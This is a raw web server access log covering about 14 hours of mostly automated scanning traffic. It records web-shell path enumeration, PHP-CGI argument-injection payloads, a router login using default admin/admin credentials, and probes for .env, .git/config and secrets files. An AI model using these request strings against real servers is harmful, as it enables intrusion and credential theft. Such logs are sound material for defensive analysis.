172.190.142.176 - - [28/Jan/2026:11:56:09 -0500] "GET /wp/wp-includes//index.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:09 -0500] "GET /ton.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:10 -0500] "GET //wso.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:10 -0500] "GET /images/fk2e3/ HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:11 -0500] "GET /a2.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:11 -0500] "GET /shell.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:12 -0500] "GET /wp-includes/IXR/moon.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:13 -0500] "GET /sxo.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:13 -0500] "GET //admin.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:14 -0500] "GET /wp-admin/ HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:14 -0500] "GET //wp-content/ HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:15 -0500] "GET /mans.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:15 -0500] "GET //dropdown.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:16 -0500] "GET /WordPress/x/ HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:16 -0500] "GET /ze.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:17 -0500] "GET //geck.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:17 -0500] "GET /menu.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:18 -0500] "GET //admin/function.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:18 -0500] "GET //index/function.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:19 -0500] "GET /flower.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:20 -0500] "GET /ftp.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:20 -0500] "GET /mds.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:21 -0500] "GET /ahax.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:21 -0500] "GET //wp-admin/class-db.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:22 -0500] "GET /cool.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:22 -0500] "GET /gm.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:23 -0500] "GET //simple.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:24 -0500] "GET //elp.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:24 -0500] "GET /bolt.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:25 -0500] "GET //wp-content/uploads/index.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:25 -0500] "GET //inputs.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:26 -0500] "GET /.trash7309/fafa/ HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:26 -0500] "GET /system.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:27 -0500] "GET /wp-admin/maint/ HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:27 -0500] "GET /wp-admin/network/ HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:28 -0500] "GET /museu/yhweq.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:28 -0500] "GET /an.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:29 -0500] "GET //w.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:29 -0500] "GET /gmo.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:30 -0500] "GET /gib.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:30 -0500] "GET /wp-miiss.php.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:31 -0500] "GET /ho/wpup.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:32 -0500] "GET //moon.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:32 -0500] "GET /filesss.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:33 -0500] "GET /hey.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:33 -0500] "GET //wp-content/themes/seotheme/mar.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:34 -0500] "GET //1337.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:34 -0500] "GET //buy.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:35 -0500] "GET /apsarasarts/okk.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:36 -0500] "GET /m.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:36 -0500] "GET /wp-is.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:37 -0500] "GET /jmfi2.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:37 -0500] "GET //about/function.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:38 -0500] "GET /bnn_.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:38 -0500] "GET //wp-content/json.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:39 -0500] "GET /hzz.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:39 -0500] "GET //shell20211028.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:40 -0500] "GET //content.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:41 -0500] "GET /wp-content/ HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:41 -0500] "GET /ps.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:42 -0500] "GET //wp-content/themes/about.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:42 -0500] "GET /.trash7309/dd/ HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:43 -0500] "GET /cache.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:43 -0500] "GET /ss.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:44 -0500] "GET /p.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:44 -0500] "GET //wp-content/plugins/achdxhv/languages/admin.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:45 -0500] "GET //user.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:45 -0500] "GET /wp-includes/block-patterns/ HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:46 -0500] "GET //index/function.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:46 -0500] "GET /wp.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:47 -0500] "GET /rip.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:47 -0500] "GET /wp4.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:48 -0500] "GET //403.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:48 -0500] "GET //wp-admin/maint/index.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:49 -0500] "GET /asd67.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:50 -0500] "GET //sad/about.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:50 -0500] "GET /oivcl.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:51 -0500] "GET //about.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:51 -0500] "GET //wp-content/themes/deeto/login.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:52 -0500] "GET /v2.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:53 -0500] "GET //wp-content/themes/hideo/network.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:53 -0500] "GET /x/ HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:54 -0500] "GET //.cache/x.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:54 -0500] "GET /dr.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:55 -0500] "GET /raw.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:56 -0500] "GET //wp-includes/css/about.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:56 -0500] "GET //wp-content/index.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:57 -0500] "GET /ioxi-o2.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:57 -0500] "GET /dropdown.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:58 -0500] "GET /dlu.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:59 -0500] "GET //wp-content/about.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:56:59 -0500] "GET /db.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:57:00 -0500] "GET /packed.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:57:00 -0500] "GET /wp-configs.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:57:01 -0500] "GET //404.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:57:02 -0500] "GET /des.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:57:02 -0500] "GET /.well-known/content.php HTTP/1.1" 302 270 "-" "-"
172.190.142.176 - - [28/Jan/2026:11:57:03 -0500] "GET //lufix.php HTTP/1.1" 302 270 "-" "-"
87.121.84.51 - - [28/Jan/2026:11:59:06 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
204.76.203.212 - - [28/Jan/2026:12:16:16 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
85.217.149.2 - - [28/Jan/2026:12:32:51 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)"
93.174.93.12 - - [28/Jan/2026:12:33:16 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; BOLT/2.800) AppleWebKit/534.6 (KHTML, like Gecko) Version/5.0 Safari/534.6.3"
193.142.147.209 - - [28/Jan/2026:12:33:45 -0500] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
44.204.29.60 - - [28/Jan/2026:12:34:24 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
204.76.203.212 - - [28/Jan/2026:12:40:55 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
162.62.132.25 - - [28/Jan/2026:13:00:09 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [28/Jan/2026:13:05:25 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
85.11.183.6 - - [28/Jan/2026:13:13:05 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
204.76.203.212 - - [28/Jan/2026:13:30:42 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.29.23.70 - - [28/Jan/2026:13:42:42 -0500] "GET /hudson HTTP/1.1" 302 270 "-" "Mozilla/5.0 zgrab/0.x"
204.76.203.212 - - [28/Jan/2026:13:55:21 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
190.242.189.253 - - [28/Jan/2026:14:06:35 -0500] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 302 270 "-" "libredtail-http"
103.247.54.126 - - [28/Jan/2026:14:12:09 -0500] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.1" 302 274 "-" "-"
93.158.90.153 - - [28/Jan/2026:14:20:37 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
170.64.227.216 - - [28/Jan/2026:14:21:00 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0"
170.64.227.216 - - [28/Jan/2026:14:21:03 -0500] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0"
205.169.39.11 - - [28/Jan/2026:14:21:17 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
148.251.250.51 - - [28/Jan/2026:14:27:19 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Linux; Android 15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.100 Mobile Safari/537.36"
64.112.126.83 - - [28/Jan/2026:14:30:19 -0500] "GET /.aider.chat.history.md HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
193.142.147.209 - - [28/Jan/2026:14:49:55 -0500] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
101.47.73.135 - - [28/Jan/2026:14:56:52 -0500] "GET /wp-json/wp/v2/posts HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
60.22.27.17 - - [28/Jan/2026:15:33:35 -0500] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 302 270 "-" "libredtail-http"
35.236.101.58 - - [28/Jan/2026:15:34:40 -0500] "HEAD /backup/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Linux; Android 14; RMX3842) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.44 Mobile Safari/537.36"
35.236.101.58 - - [28/Jan/2026:15:34:41 -0500] "HEAD / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15"
35.236.101.58 - - [28/Jan/2026:15:34:41 -0500] "HEAD /new/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.76 Safari/537.36"
35.236.101.58 - - [28/Jan/2026:15:34:42 -0500] "HEAD /wordpress/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
35.236.101.58 - - [28/Jan/2026:15:34:42 -0500] "HEAD /old/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Linux; Android 11; moto g31) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.96 Mobile Safari/537.36"
35.236.101.58 - - [28/Jan/2026:15:34:43 -0500] "HEAD /blog/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36"
35.236.101.58 - - [28/Jan/2026:15:34:43 -0500] "HEAD /wp/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
141.94.194.132 - - [28/Jan/2026:15:36:28 -0500] "GET /index.php/brunette-teens/whore-bitches.html/feed HTTP/1.1" 302 390 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.66 Safari/537.36"
104.152.52.131 - - [28/Jan/2026:15:55:47 -0500] "GET / HTTP/1.1" 302 390 "-" "curl/7.61.1"
91.224.92.115 - - [28/Jan/2026:15:56:58 -0500] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 302 270 "-" "-"
204.76.203.69 - - [28/Jan/2026:15:57:36 -0500] "GET / HTTP/1.1" 302 390 "-" "-"
204.76.203.18 - - [28/Jan/2026:16:06:05 -0500] "GET /backup/ HTTP/1.1" 302 270 "-" "-"
45.194.92.199 - - [28/Jan/2026:16:07:20 -0500] "GET / HTTP/1.1" 302 390 "-" "Hello World"
41.228.175.249 - - [28/Jan/2026:16:18:57 -0500] "GET /.env HTTP/1.1" 302 270 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
129.226.213.145 - - [28/Jan/2026:16:45:50 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
5.183.209.196 - - [28/Jan/2026:16:47:01 -0500] "GET /SDK/webLanguage HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.69 - - [28/Jan/2026:16:49:19 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.153.96.233 - - [28/Jan/2026:16:57:29 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
172.202.117.179 - - [28/Jan/2026:17:12:07 -0500] "GET /developmentserver/metadatauploader HTTP/1.1" 302 270 "-" "Mozilla/5.0 zgrab/0.x"
193.142.147.209 - - [28/Jan/2026:17:22:59 -0500] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
13.229.120.120 - - [28/Jan/2026:17:28:33 -0500] "GET / HTTP/1.1" 302 390 "-" "Go-http-client/1.1"
35.203.211.193 - - [28/Jan/2026:17:41:01 -0500] "GET / HTTP/1.1" 302 390 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
20.168.13.53 - - [28/Jan/2026:17:55:37 -0500] "GET /actuator/health HTTP/1.1" 302 270 "-" "Mozilla/5.0 zgrab/0.x"
170.106.35.153 - - [28/Jan/2026:18:10:47 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
71.6.134.230 - - [28/Jan/2026:18:34:27 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
198.235.24.220 - - [28/Jan/2026:19:01:20 -0500] "GET / HTTP/1.1" 302 390 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
157.245.98.43 - - [28/Jan/2026:19:30:17 -0500] "GET /.env HTTP/1.1" 302 270 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
157.245.98.43 - - [28/Jan/2026:19:30:18 -0500] "GET /.git/config HTTP/1.1" 302 270 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
43.153.35.128 - - [28/Jan/2026:19:33:43 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
113.192.30.94 - - [28/Jan/2026:19:39:01 -0500] "GET /wp-json/wp/v2/posts HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
193.142.147.209 - - [28/Jan/2026:19:47:30 -0500] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
43.130.10.146 - - [28/Jan/2026:19:56:30 -0500] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 302 270 "-" "libredtail-http"
64.112.126.83 - - [28/Jan/2026:19:57:09 -0500] "GET /secrets.py HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
45.148.10.247 - - [28/Jan/2026:20:07:43 -0500] "GET /.git/config HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
5.61.209.92 - - [28/Jan/2026:20:22:57 -0500] "GET /SDK/webLanguage HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.132.153.142 - - [28/Jan/2026:20:48:51 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
66.132.153.142 - - [28/Jan/2026:20:48:55 -0500] "GET /login HTTP/1.1" 302 270 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.33.109.18 - - [28/Jan/2026:21:32:34 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 zgrab/0.x"
66.228.53.174 - - [28/Jan/2026:21:32:45 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
193.142.147.209 - - [28/Jan/2026:21:54:46 -0500] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
130.12.180.108 - - [28/Jan/2026:22:18:25 -0500] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
222.234.52.105 - - [28/Jan/2026:22:18:48 -0500] "GET //wp-json/wp/v2/posts HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
204.76.203.69 - - [28/Jan/2026:22:22:19 -0500] "GET / HTTP/1.1" 302 390 "-" "-"
46.151.182.53 - - [28/Jan/2026:22:52:42 -0500] "GET /.env HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
46.151.182.53 - - [28/Jan/2026:22:52:42 -0500] "GET /wp-content/ HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
170.106.148.137 - - [28/Jan/2026:23:05:10 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.106.193.108 - - [28/Jan/2026:23:42:37 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
110.166.71.39 - - [28/Jan/2026:23:46:00 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
193.142.147.209 - - [29/Jan/2026:00:10:26 -0500] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
91.224.92.115 - - [29/Jan/2026:00:29:27 -0500] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 302 270 "-" "-"
176.113.115.74 - - [29/Jan/2026:00:35:51 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
43.130.53.252 - - [29/Jan/2026:01:06:43 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
51.89.25.52 - - [29/Jan/2026:01:08:33 -0500] "GET /blog-verify HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
51.89.25.52 - - [29/Jan/2026:01:08:33 -0500] "GET /?check_plugin HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
162.62.132.25 - - [29/Jan/2026:01:27:23 -0500] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
